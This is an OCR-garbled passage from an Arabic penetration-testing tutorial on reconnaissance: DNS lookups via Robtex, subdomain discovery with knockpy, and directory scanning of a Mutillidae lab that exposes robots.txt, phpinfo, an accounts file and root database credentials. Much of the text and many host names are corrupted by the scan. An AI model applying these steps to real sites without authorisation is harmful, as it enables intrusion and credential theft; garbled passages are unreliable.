تشغیله على ۴۳1۴ ویقوم بتشغیل م۲1٥4۷85ل.‏ یستخدم [۷٥۲۵۴۲٥55‏ حتی نتمکن من استخدام 
58 لاختراق الموقع. إذا انتقلنا إلى أعلى» اكتشفنا أيضًا استضافة الويب للموقع. لذلك» في 
أسواً السيناريوهات» يمكننا محاولة اختراق خادم استضافة الويب والوصول إلى موقعنا الإلكتروني 
الس دف 
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 Robtex [| Robey 


سنناقش في هذا القسم كيف يمكننا الحصول على معلومات 0(8 الشاملة حول موقع الويب المستهدف. 
الآن سنناقش ما هو N8‏ 0. لنفترض اننا كتبنا ۷ 00. ا6006 في عنوان ا۸ لاء ثم سیتم تحویله 
إلى عنوان ۳| باستخدام خادم 0[5. يحتوي على عدد من السجلات» ویشیر کل سجل إلى عنوان ۴| 
مختلف ومجال مختلف. في بعض الأحيان» تشير السجلات إلى نفس |. بشكل عام» يطلبون اسم 
النطاق» ويتم تحويله إلى عنوان ۴|ء وعلى أساس العنوان» يجب تخزين المعلومات في مكان ما. سنقوم 
بالاستعلام عن خادم (N5‏ ونرى ما هي المعلومات التي نحصل عليها يتم توضيح العملية في المخطط 
المعطى : 


DNS SERVER 


mm 


1 ا 


نستخدم موقعَا على الويب يسمى »)/Robtex https://www .rob‌×.٥C0١‏ وابحثٹ عن 
9. ايع هءا. الآن» فقط اضغط على 60 وحدد النتيجة الأولى على الموقع. 


[IAF] TTT TT 


isecurlty.ore QUICK info 


General 
FQDN isecurlty. org 
Host Name 
Domain Name isecurlty.org 
Registry Org 
TLD Org 
DNS 
IP numbers 46. 101.29. 109 
Name servers ns1.digitalocean. com 
ns#.digitalocean. com 
ns3.diqitalocean. Com 
Mail servers aspmx.l. qoogle.com 


alt1.aspmMx.l. google.com 
alt#.aspmMx.l. google.com 
alt3.aspmMx.l. google.com 
alt4#.aspmx.l. google. Com 


في لقطة الشاشة السابقة» نحصل على معلومات حول الموقع. يمكننا أن نرى تقرير 0۸15ء خوادم الأسماء 
التي تم استخدامهاء وبعض خوادم البريد. يمكننا أيضًا رؤية السجلات التي كنا نتحدث عنها وخادم 0۸S‏ 
كما هو موضح في لقطة الشاشة التالية: 


IsecUrTty.Org 
a 46. 101.29, 109 
whois business xDSL last miles w/ managed CPE various tech. centers 
route 46.101.0.0/18 
bep AS14061 
asname DOSFO DigitalOcean SF Region 
descr Komlnvest route 
location London, United Kingdom 
ns ns1.digitalocean.com 
a #2400:cbO0:2049: 1::adf5:3033 
route 2400:cbO0:2049::/48 
bep A513335 
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في لقطة الشاشة السابقةء يمكننا رؤية كل هذه السجلات. يمكننا أن نرى السجل» الذي يحول اسم المجال 


إلى عنوان ۱۴ء واذا تذكرناء عندما کنا نؤدي خداع 08ء أضفنا سجلاً ۸ في ملفات 45.٥0٩۴‏ و 
۴.71 الخاصة بنا. يتم استخدام السجل في خوادہم N5‏ 0 لربط |١۵٥1۲1۷.٥۲9‏ بعنوان ۴| الخاص 
به. مرة أخرى» هناك نوع آخر من السجلات. على سبيل المثالء لدينا سجل ٠١5‏ الذي يربط المجالء 


خادم الاسم. 


في لقطة الشاشة التاليةء يمكننا أن نرى سجل ٠٠×‏ الذي يربطه بخادم البريدء ويمكننا أن نرى أن موقع 


الويب يستخدم خادم بريد 6009٥‏ لذلك ربما یستخدم 6۵11 لتوفير خدمات البريد: 


MX aspmx.l. google.com 

û 2404 :0OOU:4OUOS CO3: : 1a 
route 2404:6800:4003::/48 

bep AS15169 

descr Google 

location Singapore, Singapore 

2404 :6500:4008:000:: 1b 
route 2404:6800:4008::/48 

beep A515169 


إذا انتقلنا لأسفل» فيمكننا أن نرى أن لدينا رسمًا بيانيًا عن كيفية تفاعل جميع الخدمات مع بعضها البعض› 
وكيف تستخدم الخدمات السجلات» وكيف يتم ترجمتها إلى عنوان ۴| كما هو موضح في لقطة الشاشة 
التالية: 


GRAPH E 


455 
ns1.digitalocean cam 


nasê. digîtalocsan,com 


۱ ِ AS19165 
Kk atl.aspmz.l.google com 


A453 N 4 
1 alt4.aspmx.l.goagle.com 
1 اس‎ r 


| 7 کے 8 و 


aspma.l. google.com 
4E, ITO. 1S 
م‎ 


re3. digitalocean.com 
alt3.a5pmx.l.google.com 


ASO UZ 


في علامة التبويب المشتركةء يمكننا معرفة ما إذا كان يتم مشاركة أي من هذه الموارد كما هو موضح 
في لقطة الشاشة التالية: 


ns1.digitalocean.com 
ns2.digitalocean.com 
ns3.digitalocean.com 


isecurlty.com A OO:chbON: AO: 1:radfS: 3a 33 


ask. isecur lly. org 


A4HOO:cCbOO:A2049:1::adf5: 329 
A4HOO:cbOO:2049: 1:629: dead 
1.1 

1.9, 1 

198.41.222173 


results shown. 


1012510 www.isecurlty.org 
1 results shown. 1 results shown. 
aspmx.l.qoogle.com security1.coOm.aul 2607:F8bO:4001:c1d::1a Domains or hostnames one step under this domain or hostname, 
a#tl.aspmx.l. google.com 1 results shown. AOU :TFObO:HOOI:COS::1a ask.isecurlty.org 


results shown. 
results shown. 


altZ.a5pmx.Î. google.com AOU: FRbO:HOOA:cCO3::1b roadmap.isecurlty. arg 
alt3.aspmzx. l1. google.com 2AADUO:1450:40Ob:CON::1a server, isecUrlty.org 
altt.aspmzx.l. google.com AAO: 1450:4013: COA2::12 www, isecurlty.org 

5 results shown. 64.233.188. 26 results shown. 


رت لات ا 
Li E PEE ez‏ 
173.194.218.27 
UCR: REE EE‏ 


10 results shown. 


Iblings are domains or hostnames on the same level, under the same parent level, Hot necessarily related in any other way nis sub section shows this name on other top level domains. 
1Isecurity.org isecurlty.coam 
security 1.0rg isecurlty.net 

rasults shown. isecurlty. 110mb.com 


isecurlty.us7.list-manage.com 


في لقطة الشاشة السابقةء يمكننا أن نرى أنه يستخدم تلاثة خوادم أسماء. يمكننا أن نرى خوادم البريدء 
ويمكننا أن نرى أيضًا عددا من مواقع الويب تشير إلى نفس عنوان ۴|ء ويشير عدد من اسم المجال إلى 
نفس عنوان |. يتم تخزين المواقع السابقة على نفس خادم الويب. الآن» مرة أخرى» هناك مزيد من 
المعلومات حول خوادم الأسماء ومواقع الويب التي تشارك خوادم البريد. لا يعني هذا أن مواقع الويب هذه 
موجودة على نفس الخادم» ولكن الشيء الأكثر أهمية هو أن لدينا مواقع ويب تشير إلى نفس عنوان ۴١ء‏ 
مما يعني أن هذه المواقع موجودة على نفس الخادم. الآن» إذا تمكنا من الوصول إلى أي من المواقع 
المذكورة» سيكون من السهل الوصول إلى ۷.0۲9أC۷۲1٥ع5|.‏ 


java WV point ۵ 
Discovering Subdomain اكتشاف المجال الفرعى‎ 


في هذا القسم» سوف ندرس النطاق الفرعي. نرى نطاقا فرعيًا في كل مكان» على سبيل المثالء 
com‏ .domain.targetطuء.‏ الآنء اذا کان لدینا 0۳٥.0۸٥0٥ceھeta.fط»‏ سنحصل علی 


e.facebook.comاmobi.‏ أو قد یکون لدینا .user.facebo0o).٥c0۳‏ لنفترض أننا eاوooوg‏ 
e.cnاو00و.اأة"»‏ والذي يأخذنا إلى اأة٣6.‏ يستخدم النطاق الفرعي في الكثير من الحالات» ومواقع 
الويب لها نطاق فرعي لمستخدميهاء على سبيل المثالء لعملاء معينين أو للموظفين» بحيث لا يتم الإعلان 
عنها إلا إذا كان هناك نوع من عملاء ۷1۴. لن نرى نطاقا فرعيًا على محرك البحث ولن نرى أبدًا رابطا 
يؤدي إليهم» لذلك قد تحتوي على استغلالات أو تغرات أمنية من شأنها أن تساعدنا في الوصول إلى 
الموقع الإلكتروني بأكملهء لكننا لم نعرف أبدا عن تلك التغرات أو الثغرات الأمنية لأنها أبدا الإعلان 
عنها. شيء آخر هو أنه عندما تحاول الكثير من مواقع الويب الكبيرة إضافة ميزة جديدة أو تثبيت تحديث 
جديد إلى موقع الويب» تم تتبيته في نطاق فرعي لذلك لدينا 0۳٥.000۸ءه1.ه٥0.‏ والذي يحتوي 
على إصدار تجريبي من ۴4٥۴600۸‏ والذي يحتوي على ميزات تجريبية. تعد الميزات التجريبية الان 
رائعة للمخترقين لأنها لا تزال قيد التطويرء وهناك فرصة كبيرة لإيجاد استغلالات فيها فيها. هذا صحيح 
بالفعل لأنه قبل بعض الوقت» كان شخص ما قادرا على استخدام مفتاح استعادة كلمة المرور لأي مستخدم 
على 00۸ ط٥۴۵‏ وکان قادرا علی الوصول إلى أي حساب مستخدم علی 00۸ ٥6٥ھ۴.‏ کان ھذا ممکدًا 
فقط من خلال موقع beta. Facebook.com‏ لان Facebook)‏ اعتاد البحث عن عدد من المحاولات 
أو المحاولات الفاشلةء ولم يطبقوا ميزة الأمان هذه في إصدار بيتا لأنهم لم يظنوا أن أحدأ سوف يذهب 
إلى هناك. تواجه النسخة التجريبية عادة مشكلة أكبر من موقع الويب العادي» لذلك من المفيد جدًا محاولة 
اختراقها. في هذا القسم» سنرى كيف يمكننا العثور على أي نطاق فرعي لم يتم الإعلان عنه» أو حتى 
يتم الإعلان عنهاء حتى نتمكن من الحصول على نطاق فرعي من هدفنا. 

سوف نستخدم أداة تسمى .۸٣١٥١۸‏ هذه الأداة بسيطة للغاية ولا نحتاج إلى تثيتها. علينا فقط تنزيله 


باستخدام أمر ). للقيام بذلك» نضع أمر ا ثم نضع عنوان ا8ل للأداة کما هو موضح أدناه: 


[IAT] TTT TTT 


root@kali :~# git clone 


https://github.com /guelfoweb /knock.git 


بمجرد تنزيله» سنستخدم الأمر 4 للتنقل فيه. بعد التنقل» سنرى أن لدينا ملف ۷م.» كما هو موضح 


root@kali:~# cd knock/knockpy/ 
root@kali:~/ knock/knockpy# Is 


الآن» سنقوم بتشغیل هذا الملف باستخدام الأمر ۷م.۸P۷٥٥٣)‏ ٣٥طالإمء‏ ومن تم سندخل موقع الویب 
الذي نريد الحصول عليه من النطاق الفرعي» وهو ٥1۲1.0١۲9‏ ۴|. الأمر كالتالي: 


أدناه: 


root@kali:~/ knock /knockpy# python knockpy.py 


isecurlty.org 


سيؤدي ذلك إلى إجراء بحث عن نطاقات فرعية تستند إلى ماوممB‏ عن 1۲1۷ا اء وسيّظهر لنا أي 
نطاق فرعي قد يكون ل |5۵٥۷۲1۷‏ أنه يمكننا تجربته واختبار أمانه ومعرفة ما تم تثبيته عليه. ربما 
سنكون قادرين على الوصول إلى الموقع من خلال هذا النطاق الفرعي. بمجرد اكتمال الفحص» كما نرى 
في لقطة الشاشة التاليةء تمكنا من العثور على سبعة نطاقات فرعية لم يتم الإعلان عنها: 


Getting subdomain for isecurity , org 


Ip Address Domain Name 


ftp.isecurlty .org 
secUrlty .orgd 
PRE EAY 
mail.isecurlty .org 
1securlity .org 
news .1SeCUrlty .org 
server. 1seCUrlty .org 
ww. 1SecUrlty .org 
1securlty .org 


Found 7 sibdomaih(s) in 3 host(5s). 
6/7 subdomain(s) are in wordlist. 


Qutput saved ih CSV format: 1isecuUrlty_Ordg_1465147962.,69.€5V 
:~/knock/knockpy# § 


الآان» واحد منهم هو ecu۲1.0۲9ءا.م)؟.‏ ناقشنا بالفعل حول sSeCu۲1⁄.09ا»‏ و 
hst.isecur1ty.or9اهعا‏ هو مجرد مجال فرعي محلي. يمکننا أن نری أن ٥۲1.0۲9‏ ۵e؛|.‏ اھ" 
له نطاق فرعي خاص به» ويمكننا أن نرى مجالا ممتعًا للغايةء ..6W5.|500۷۲1⁄.0۲9‏ إنه بالفعل 
يحتوي على نسخة تجريبية من البرنامج النصي الذي تم العمل عليه. وبالتالي» إذا كان شخص ما يحاول 
اختراق موقع الويب الخاص بناء فسوف يرى في الواقع أن هناك نصًا قيد التطوير»ء وهناك احتمال كبير 
أن يتمكنوا من العثور على ثغرة أمنية فيه والوصول إلى موقع الويب بالكامل. 


هذا يوضح لنا مرة أخرى مدى أهمية جمع المعلومات» والتي يمكن استخدامها للوصول إلى المواقع. إذا 
لم نفعل ذلك» فسنفقد الكثير من الأشياء. على سبيل المثال» قد نفتقد نصًا برمجبًا كاملا به عدد كبير من 
التغرات» أو قد نفقد صفحة تسجيل دخول المشرف أو صفحة تسجيل دخول الموظف. 


[I4I] TTT TTT 


تحلبل اكتشاف الملفات Analysing Discovering‏ 
ا Files‏ 


فى لقطة الشاشة التاليةء يمكننا رؤية النتيجة التى تمكنت بها أداة أل من العثور على عدد من الملفات. 
بعض الملفات التى نعرفها بالفعل: 
GENERATED WORDS: 46l2‏ 


---- Scanning URL: http://10.0.2.4/mutillidae/ ---- 

==>» DIRECTORY: http://10.0.2.4/mutillidae/classesy/ 

+ http://10.0.2.4/mutillidae/credits ( CODE : 200 | SIZE: 509) 

==» DIRECTORY: http://10.0.2.4/mutillidae/documentationy/ 

+ http://10.0.2.4/mutillidae/favicon.ico (CODE: 200 | SIZE: 1150) 

+ http://10.0.2.4/mutillidae/footer ( CODE : 200 | SIZE: 450) 

+ http://10.0.2.4/mutillidae/header (CODE: 200 | SIZE: 19879) 

+ http://10.0.2.4/mutillidae/home ( CODE : 200 | SIZE: 2930) 

===» DIRECTORY: http://10.0.2.4/mutillidae/imagesy 

+ http://10.0.2.4/mutillidae/inc (CODE: 200 | SIZE: 386260) 

==» DIRECTORY: http://10.0.2.4/mutillidae/includesy/ 

+ http://10.0.2.4/mutillidae/index (CODE: 200| SIZE:24237) 

+ http://10.0.2.4/mutillidae/index.php (CODE: 200| SIZE:24237) 

+ http://10.0.2.4/mutillidae/installation (CODE: 200| SIZE:8138)} 

==» DIRECTORY: http://10.0.2.4/mutillidae/javascripty/ 

+ http://10.0.2.4/mutillidae/login (CODE: 200| SIZE:4102) 

+ http://10.0.2.4/mutillidae/notes ( CODE : 200 | SIZE:1721) 

+ http://10.0.2.4/mutillidae/page-not-found (CODE : 200 | SIZE: 705) 

==» DIRECTORY: http://10.0.2.4/mutillidae/passwordsy/ 

+ http://10.0.2.4/mutillidae/phpinfo ( CODE : Z200 | SIZE: 48816 ) 

.2.4/mutillidae/phpinfo.php (CODE : 200 | SIZE:48828) 

.2.4/mutillidae/phpMyAdmin (CODE: 200| SIZE: 174) 
.4/mutillidae/register (CODE: 200 | SIZE: 1823) 
.4/mutillidae/robots (CODE : 200 | SIZE: 160} 

0.2.4/mutillidae/robots.txt (CODE: 200 | SIZE: 160} 

==» DIRECTORY: http://10.0.2.4/mutillidae/stylesy 


في لقطة الشاشة التاليةء يمكننا أن نرى أن ١٥.١٥ء‏ ۷ه هو مجرد رمز . ٧٣م.×6ل”|‏ هو الفهرس الذي 
نراه عادة. تعد تذييل الصفحة والرأس ملفات نمط فقط. يمكننا أن نرى أننا اكتشفنا صفحة تسجيل الدخول. 
الآن» يمكننا العثور على اسم المستخدم وكلمة المرور للهدف من خلال استغلال ثغرة أمنية معقدة بالفعل. 
بعد ذلك» لن نتمكن من تسجيل الدخول لأننا لم نتمكن من العثور على مكان تسجيل الدخول. في متل 
هذه الحالات» قد تكون أدوات مثل ١۲ل‏ مفيدة. يمكننا أن نرى أن ملف م٣م.٥؟أمام‏ مفيد جدا في 


TISL] TTT TTT 


العادة لأنه يعرض الكثير من المعلومات حول مترجم ۴۳١۶‏ الذي يعمل على خادم الويب» وكما نرى في 


لقطة الشاشة التاليةء يحتوي الملف على الكثير من المعلومات: 


Linux metasplolta ble 2.6.24-16-server #1 SMP Thu Apr 1U 13:58:00 
UTC 2008 iB 


Jan 6 2010 41:50:12 
Lol Fast bGl 
disabled 


etc php5rcqgi 
etc php3rcgi/php. ini 
eto phpSycgi/conî.d 


JetclphpSrcgifconfdygd.ini, fetcphpSrcgifconfdmysql.ini, etc phpS 
'cqifconf dimysqli.ini, fet phpS!cglfcontdypdo. ini, fet phpSycgirconî.d 
pdo_mysql.ini 

234225 

O UTE 

220005119 

rû 

disabled 

enabled 

enabled 


zip, php, file, data, http, fLp, compress. bzipê, compress.zlib, https, 
ftps 
tcp, Udp, unix, udg, ssl, ssly3, sslv2, tls 


string.rotl3, string.toupper, string.tolower, string.strip tags, 
conyvert,*, consumed, convert. icony.#, Dbzip2.*F, zlib,* 


المعلومات السابقة مفيدة. باستخدام هذه المعلومات» يمكننا التعرف على بعض الأدلة. من لقطة الشاشة 


السابقة» يمكننا أن نرى أنه يعمل على5م۸م . 


1ءء. ملف تخزين التكوين. عادة ما تكون ملفات أ٣أ.‏ هي ملف التكوين د ۴١۴۳ء‏ حتى نتمكن من رؤية 


جميع الأماكن التي تم تخزينها فيها. 


عندما نمرر إلى أسفل»ء سنرى الأذونات المثبتة. سنرى أيضًا أنه يحتوي على ا0yS۵/‏ لذلك يستخدم 


:MySQL 


System 


Build Date 
Server API 


Virtual Directory 
Support 


Configuration Fle 
(php.ini) Path 


Loaded Configuration 
File 


Scan this dir for 
additional .imi files 


additional .imi files 
parsed 


PHP API 

PHF Extension 
zend Extension 
De bug Build 
Thread Safety 


zend Memory Manager 


IPvé Support 
Registered PHP 
Streams 
Registered Stream 
Socket Transports 


Registered Stream 
Filters 


MySQL Support enabled 
Active Persistent Links 


Active Links 0 
Client API version 5.J. 51a 


MYSQL MODULE TYPE external 
MYSQL SOCKET arr my sqldfmysqld. sock 


MYSQL INCLUDE -lusrfinclude/my sql 


MYSQL LIBS -usrlib -Imysqlclient 


Directive Local Value Master Value 
ûn Ûn 


mysql.allow persistent 


mysql.connect timeout bÛ 1 
mysql.default host no vale na value 


mysql.default_ password na value 


mysql.default socket no vale na vale 
mysql.default user nma vale na vale 


mysql.max_links Unlimited Unlimited 
mysql.max_ persistent Unlimited Unlimited 


mysql.trace_mode | UT 


في لقطة الشاشة السابقةء يمكننا أن نرى الدلائل حيث يتم تخزين أنواع مختلفة من التكوينات. يمكننا أيضًا 
مشاهدة الوحدات النمطية والإضافات المستخدمة مع ۴۳١1۴‏ وبالتالي فإن ملف م۸ م.١٥‏ "امم مفيد جدا. 
في لقطة الشاشة التاليةء یمکننا أن نری اننا تمکنا من العثور على مکان تسجیل دخول My۸d ٣|۸‏ مہم 
وهذا هو الأساس الذي يتم استخدامه لتسجيل الدخول إلى قاعدة البيانات: 


ملف ۲٠٥٥٤5.»‏ هو ملف آخر مفيد للغايةء والذي يخبر محرك البحث مثل ٥ا09٥60.‏ وكيفية التعامل 
مع موقع الويب. وبالتالي» فإنه يحتوي عادة على ملفات لا نريد أن يراها أو يقرأها ماوممت. الآنء إذا 
استطعنا قراءة ملک «robots.X‏ فسنكون قادرین علی رؤية مأ يحاول مسؤول الويب إخفاءه. في أقطة 


TIS TTT TTT TT 


الشاشة التاليةء يمكننا أن نرى أن مشرف الويب لا يريد من ءاومه6 رؤية دليل يسمى كلمات المرورء 


ولا یرید منا أن نری ملفا یسمی ١٥٣|.وآ؟"هء.‏ لا يريد أن يرى هذه الملفات الأخرى: 


| http://10.0.2...ae/robots.txt X* \ F 
4# | (î | 10.0.2.4 mutillidae/robots txt 
E] Most Visited» Jf Offensive Security 
User-agent: * 

Disallow: ./passwords#/ 

Disallow: .#conTfig.1inc 

Disallow: „classes, 

Disallow: ./Javascript/ 

Disallow: .#owasp-esapl1- php, 
Disallow: .7documentat 1ony 


الآن» دعونا نرى ملفات ./55W0۲05هم‏ و .|۸٥/.‏ ۴9٣0ء‏ في لقطة الشاشة التالية: 


http://10.0. 2...ae/robots. txt %٠ Index of fmutillidae/pass.. #* ۳ 


i | 10.0.2.4/mutillidae/passwords/ 


E Most Visited Y JfOffensive Security “™, Kali Linux “™ Kali Docs “™ Kali Tools & 
Index of /mutillidae/passwords 


Name Last modified Size Description 


4 Parent Directory 
accounts.txt 11-Apr-2011 20:14 176 


Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.0.2.4 Port 80 


في لقطة الشاشة السابقةء يمكننا أن نرى أن هناك ملف ×.5أ٣uاهء٥ه»‏ بالنقر على الملف» يمكننا أن 
نرى أن لدينا بعض أسماء المستخدمين وكلمات المرور. لذلك» يمكننا أن نرى أن هناك مستخدم مسؤول» 


8 java WV point 


مع كلمة مرور المسؤّول» ويمكننا أن نرى أن لدينا كلمة مرور للمستخده 7ءء وهي کلمة مرور. في 
لقطة الشاشة التاليةء يمكننا أن نرى أننا تمكنا من العثور على أسماء المستخدمين وكلمات المرور: 


nttp:#//10.0.2...ae/robots.txt ¥ / http://10.0.2...faccounts.txt # 


E] Most Visited f Offensive Security “, Kali Linux “™ Kali Doc 


'admin', 'adminpass', 'Monkey! ! ! 

'adrlan', 'somepassword', 'Zombie Films Rock! ! | 
Tohn', 'monkey', 'I like the smell of confunk 
'ed', 'pentest', 'Commandline KungFu anyone? ' 


الآن» ما زلنا غير متأكدين من أسماء المستخدمين وكلمات المرور السابقة من أجل» لكننا متأكدون من 
ننا تمكنا من العثور على معلومات مفيدة للغاية. ملف ١٥"|.وأ؟٣ه٣‏ هو ملف آخر مفيد. في لقطة 
الشاشة التالية يمكننا أن نرى أن لدينا معلومات تسمح لنا بالاتصال بقاعدة البيانات» لأنها تحتوي على 
معلمات :dbname $ , $ dbpass, $ dbuser, $ dbhost‏ 


http://10.0.2...ae/robots.txt x http://10.0.2...faccounts.txt ¥ / http://10.0.2...aefconfig.inc # 
i | 10.0.2.4/mutillidae/config.inc 


Most Visited» Offensive Security “™, Kali Linux “™, Kali Docs “™, Kali Tools & Exploit-DE ly 


+7? php 
#* NOTE: On Samural, the $dbpass password 1s "samural" rather than blank */ 
$dbhost = 'localhost'; 
$dbuser = 'root'; 
$dbpass = ''; 
$dbname = 'metasploit'; 
f 


في لقطة الشاشة السابقةء يمكننا أن نرى أن اسم المستخدم هو الجذر وكلمة المرور فارغةء لذلك يمكننا 
المضي قدمًا ومحاولة الاتصال بقاعدة البيانات بناءَ على أوامر من لقطة الشاشة السابقةء ومن ثم يجب 
أن نتمكن من الوصول إلى قاعدة البيانات. 

أيضًا» ما زلنا غير متأكدين من حيث يمكننا استخدامهاء ولكن يمكننا إضافتها إلى قائمة لمحاولة تسجيل 


الدخول إلى المشرف» أو تخزينها فقط في قائمة حتى نتمكن من استخدامها في حالة قيامنا باستخدام 


هجوم القوة الغاشمة (٥٥۲٥0؟-عu)eا0).‏ 
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